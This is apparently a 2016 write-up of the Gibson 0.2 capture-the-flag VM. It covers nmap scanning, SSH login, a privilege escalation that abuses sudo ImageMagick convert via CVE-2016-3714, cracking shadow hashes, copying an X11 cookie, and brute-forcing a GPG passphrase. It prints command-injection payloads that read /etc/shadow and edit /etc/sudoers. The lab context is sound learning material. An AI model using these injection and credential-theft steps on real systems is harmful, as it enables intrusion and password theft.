Gibson 0.2

I decided to get started in the world of CTF writeups with this VM made by Knightmare! The description promised some unexpected twists, but at the same time it didn’t seem to be heavy on reversing and/or binary exploitation, so I felt it was a good place to start. Without further ado, let’s begin!

Service discovery

The starting point is always finding out which services are running on the open ports, so let’s do that.

root@kali:~# nmap -A -p1-65535

Starting Nmap 7.01 ( ) at 2016-05-17 18:14 CEST
Nmap scan report for
Host is up (0.00022s latency).
Not shown: 65533 closed ports
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 fb:f6:d1:57:64:fa:38:66:2d:66:40:12:a4:2f:75:b4 (DSA)
|   2048 32:13:58:ae:32:b0:5d:b9:2a:9c:87:9c:ae:79:3b:2e (RSA)
|_  256 3f:dc:7d:94:2f:86:f1:83:41:db:8c:74:52:f0:49:43 (ECDSA)
80/tcp open  http    Apache httpd 2.4.7
| http-ls: Volume /
| SIZE  TIME              FILENAME
| 273   2016-05-07 13:03  davinci.html
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Index of /
MAC Address: 08:00:27:AF:47:CA (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.0
Network Distance: 1 hop
Service Info: Host:; OS: Linux; CPE: cpe:/o:linux:linux_kernel

1   0.22 ms

OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 23.83 seconds

Of course I was not going to be able to straightforward SSH in, so I’d better check what’s in the web server.

Web server

I opened Iceweasel and navigated to port 80. There was a single file listed: davinci.html

<!-- Damn it Margo! Stop setting your password to "god" -->
<!-- at least try and use a different one of the 4 most -->
<!-- common ones! (eugene) -->
<h1> The answer you seek will be found by brute force</h1>

This seemed a pretty clear hint to the SSH credentials. I tried the ssh users Margo, davinci, root and eugene but neither was asked for a password (only publickey). I thought in being explicit, just in case:

ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no

But no luck, the password login was disabled.

…Then I noticed I had tried Margo, not margo, and guess what?

ssh margo@ #god



Of course sudo su didn’t work (it would have been too easy, right?) but I was luckier with sudo -l. It seemed that margo could run /usr/bin/convert as root. The binary was part of the ImageMagick tool… which reminded of CVE-2016-3714.

After some research, I managed to run commands as root exploiting said vulnerability. The fastest way to get root with this was to edit the sudoers file, but before that I played around a little.

margo@gibson:~$ sudo convert '"|cat "/etc/shadow' out.png
convert.im6: unable to open image `/tmp/magick-rCN9wlXv': No such file or directory @ error/blob.c/OpenBlob/2638.
convert.im6: unable to open file `/tmp/magick-rCN9wlXv': No such file or directory @ error/constitute.c/ReadImage/583.
convert.im6: no images defined `out.png' @ error/convert.c/ConvertImageCommand/3044.

I cracked the hashes for duke and eugene with John the Ripper, which was surprisingly fast.

root@kali:~/gibson# john hashes.txt 
Created directory: /root/.john
Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
Use the "--format=crypt" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 3 password hashes with 3 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:07 75.42% 1/3 (ETA: 18:47:31) 0g/s 811.3p/s 811.3c/s 811.3C/s 9999955..d9999957
secret           (eugene)
love             (duke)
god              (margo)
3g 0:00:00:16 DONE 2/3 (2016-05-17 18:47) 0.1806g/s 729.3p/s 740.8c/s 740.8C/s fiction..jethrotull
Use the "--show" option to display all of the cracked passwords reliably
Session completed


duke seemed a pretty normal user, but eugene was good news. From the sudoers file I found out that eugene could execute another command as root:

eugene ALL=(ALL) NOPASSWD: /usr/bin/virt-manager 

Which I honestly had no idea what it was. After some googling, I learned that virt-manager is a VM manager! Then I remembered the hints given at the description of the challenge:

  • It doesn’t matter what your local subnet is, as long as you keep away from the subnet.
  • SSH can forward X11.
  • The challenge isn’t over with root. The flag is not where you expect to find it.

The network part was interesting.

eugene@gibson::~$ ifconfig
eth0      Link encap:Ethernet  HWaddr 08:00:27:af:47:ca  
          inet addr:  Bcast:  Mask:
          inet6 addr: fe80::a00:27ff:feaf:47ca/64 Scope:Link
          RX packets:143078 errors:0 dropped:0 overruns:0 frame:0
          TX packets:140857 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:9389412 (9.3 MB)  TX bytes:11069499 (11.0 MB)

lo        Link encap:Local Loopback  
          inet addr:  Mask:
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:752 errors:0 dropped:0 overruns:0 frame:0
          TX packets:752 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:54416 (54.4 KB)  TX bytes:54416 (54.4 KB)

virbr0    Link encap:Ethernet  HWaddr fe:54:00:72:e2:fb  
          inet addr:  Bcast:  Mask:
          RX packets:6 errors:0 dropped:0 overruns:0 frame:0
          TX packets:15 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:1271 (1.2 KB)  TX bytes:1889 (1.8 KB)

vnet0     Link encap:Ethernet  HWaddr fe:54:00:72:e2:fb  
          inet6 addr: fe80::fc54:ff:fe72:e2fb/64 Scope:Link
          RX packets:6 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1665 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:500 
          RX bytes:1355 (1.3 KB)  TX bytes:87921 (87.9 KB)

Wow, so there was actually another active interface: virbr0. Could it be that, inside the VM, there was ANOTHER VM?

The thing was that I couldn’t SSH as eugene directly, because of the no-password restriction. I could’ve added a public key to his home directory or disabled the restriction, but rather I just su‘d into him.

…Which was a pain, because when running sudo virt-manager it complained about the X11 authentication failing. Of course, I didn’t have an xauth cookie for eugene. So I copied it from margo.

root@kali:~/gibson# ssh -X margo@
Ubuntu 14.04.3 LTS
margo@'s password: #god
margo@gibson:~$ xauth list
gibson/unix:10  MIT-MAGIC-COOKIE-1  01dccb5a0820e7f65c5211528c49c0eb
margo@gibson:~$ su eugene
Password: #secret
eugene@gibson:/home/margo$ xauth add gibson/unix:10  MIT-MAGIC-COOKIE-1  01dccb5a0820e7f65c5211528c49c0eb
eugene@gibson:/home/margo$ sudo /usr/bin/virt-manager

Holy f*ck, I got in.


Of course, I could’ve always modified the /etc/sudoers file and get root directly:

sudo convert '"|vi "/etc/sudoers' out.png

Change the following line:

margo ALL=(ALL) NOPASSWD: ALL#/usr/bin/convert

And voilà.

margo@gibson:~$ sudo su


The virt-manager GUI appeared, and only one machine named “ftpserv” existed. I opened a shell by double-clicking it and discovered that it was running a FreeDOS :-O Had to Google quite a bit at this point…

Once I thought I could continue, I started by exploring the directories. After a dir I found this directory named GARBAGE which catched my attention.

cd garbage


The FLAG.IMG seemed interesting, but I had to find a way to take it outside the box.

I decided to go big and copied the full VM disk image to my Kali box. I’m subtle as that :)

At this point, the root permissions became a need, so I modified the sudoers file as explained before.

margo@gibson:~$ sudo su
root@gibson:/home/margo# cp /var/lib/libvirt/images/ftpserv.img /tmp/
root@gibson:/home/margo# chown margo /tmp/ftpserv.img

And then I was able to get it from my Kali:

root@kali:~# scp margo@ gibson

Getting the flag

I mounted the image (fun name, KFLYNN, Kevin Flynn from Tron!) and went to garbage.

There I ran exiftool to peek on the metadata of the JPG file:

root@kali:/media/root/KFYLNN/GARBAGE# exiftool adminspo.jpg
ExifTool Version Number         : 10.15
File Name                       : adminspo.jpg
Directory                       : .
File Size                       : 120 kB
File Modification Date/Time     : 2016:05:04 23:17:44+02:00
File Access Date/Time           : 1980:01:01 01:00:00+01:00
File Inode Change Date/Time     : 2016:05:04 23:31:08+02:00
File Permissions                : rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
Exif Byte Order                 : Big-endian (Motorola, MM)
Image Description               : Rabbit.. Flu Shot... TYPE COOKE YOU IDIOT! I'll head them off at the pass
Modify Date                     : 2016:05:04 22:29:32
Artist                          : Virtualization is fun.. What's more, esoteric OSes on 192.168.122 are even more fun
User Comment                    : So there's info here.... Images, hmm... Wasn't that a CVE...? Oh yes... CVE 2016-3714.... so which person can run it. Perhaps the man who knew a lot about Sean Connery in Trainspotting when he wasn't  causing a 7 point drop in the NYSE
JFIF Version                    : 1.01
Resolution Unit                 : None
X Resolution                    : 1
Y Resolution                    : 1
Image Width                     : 800
Image Height                    : 800
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 800x800
Megapixels                      : 0.640

Fun, but not useful anymore :)

So it was time to mount flag.img.

There were three files, an executable program, its source code in C, and a hint.txt file.

root@kali:/media/root/d59bdd40-ec37-4d24-a956-80f549846121# cat hint.txt and have
someone in common... Can you remember his
original nom de plume in 1988...?

So it turns out Trainspotting and Hackers have the actor Jonny Lee Miller in common. I had to search what “nom de plume” meant (lol), but I quickly learnt it translates to “nickname”. I guess I should’ve known that already but… Whatever, Miller’s nickname in Hackers (which takes place in 1988) is “Zero Cool/Crash Override”. But what do I do with that?

I have to say I spent quite too much time trying to break the game in order to get something interesting. Modified the highscores.txt file trying to make it crash, entered ZeroCool and CrashOverride as users just in case, played around with the snake (fun game btw), but eventually…

root@kali:/media/root/d59bdd40-ec37-4d24-a956-80f549846121# ls -la
total 70
drwxr-xr-x  4 root root  1024 May 14 15:07 .
drwxr-x---+ 4 root root  4096 May 21 09:40 ..
-rwxrwxr-x  1 root root 21358 Nov 16  2011 davinci
-rw-r--r--  1 root root 28030 Nov 16  2011 davinci.c
-rw-r--r--  1 root root   159 May  5 20:56 hint.txt
drwx------  2 root root 12288 May  5 20:39 lost+found
drwxr-xr-x  2 root root  1024 May  5 21:07 .trash

Yeah, maybe I should have started by doing that.

root@kali:/media/root/d59bdd40-ec37-4d24-a956-80f549846121# cd .trash/
root@kali:/media/root/d59bdd40-ec37-4d24-a956-80f549846121/.trash# ls -la
total 319
drwxr-xr-x 2 root root   1024 May  5 21:07 .
drwxr-xr-x 4 root root   1024 May 14 15:07 ..
---x------ 1 root root    469 May 14 15:18 flag.txt.gpg
-rw-r--r-- 1 root root 320130 Sep  7  2015 LeithCentralStation.jpg

So now I need the passpharse to decrypt the flag! Could it be that the hint.txt was referring to this?

Tried the gpg command with ZeroCool, zerocool, CrashOverride and crashoverride as passphrases to no avail. I ran exiftool on the jpg file, but there was nothing interesting.

So I decided to go full bruteforce and generated some wordlists with cupp’s interactive mode.

root@kali:~/gibson# ~/ -i
root@kali:~/gibson# for i in $(cat ~/cupp/zero.txt); do gpg --passphrase $i flag.txt.gpg; if [ -a "flag.txt" ]; then echo "Passphrase found! $i"; break; fi; done

After some tries and combinations, what finally made the trick was including the word ‘ZeroKool’ AND activating the tool’s l33t mode.

gpg: CAST5 encrypted data
gpg: encrypted with 1 passphrase
gpg: WARNING: message was not integrity protected
Passphrase found! Z3r0K00l
root@kali:~/gibson# cat flag.txt
 _   _            _      _____ _             ____  _                  _   _
| | | | __ _  ___| | __ |_   _| |__   ___   |  _ \| | __ _ _ __   ___| |_| |
| |_| |/ _` |/ __| |/ /   | | | '_ \ / _ \  | |_) | |/ _` | '_ \ / _ \ __| |
|  _  | (_| | (__|   <    | | | | | |  __/  |  __/| | (_| | | | |  __/ |_|_|
|_| |_|\__,_|\___|_|\_\   |_| |_| |_|\___|  |_|   |_|\__,_|_| |_|\___|\__(_)

Should you not be standing in a 360 degree rotating payphone when reading
this flag...? B-)

Anyhow, congratulations once more on rooting this VM. This time things were
a bit esoteric, but I hope you enjoyed it all the same.

Shout-outs again to #vulnhub for hosting a great learning tool. A special
thanks goes to g0blin and GKNSB for testing, and to g0tM1lk for the offer
to host the CTF once more.

Phew! For my first CTF writeup, this one surely got me confused for a while and made me take my time! I’m sure this could have been done better/faster, but nonetheless I managed to complete it. Big thanks to Knightmare for the fun challenege, I really enjoyed the movie references and learned quite a few new things (special mention to the whole FreeDOS thing!)

Written on May 21, 2016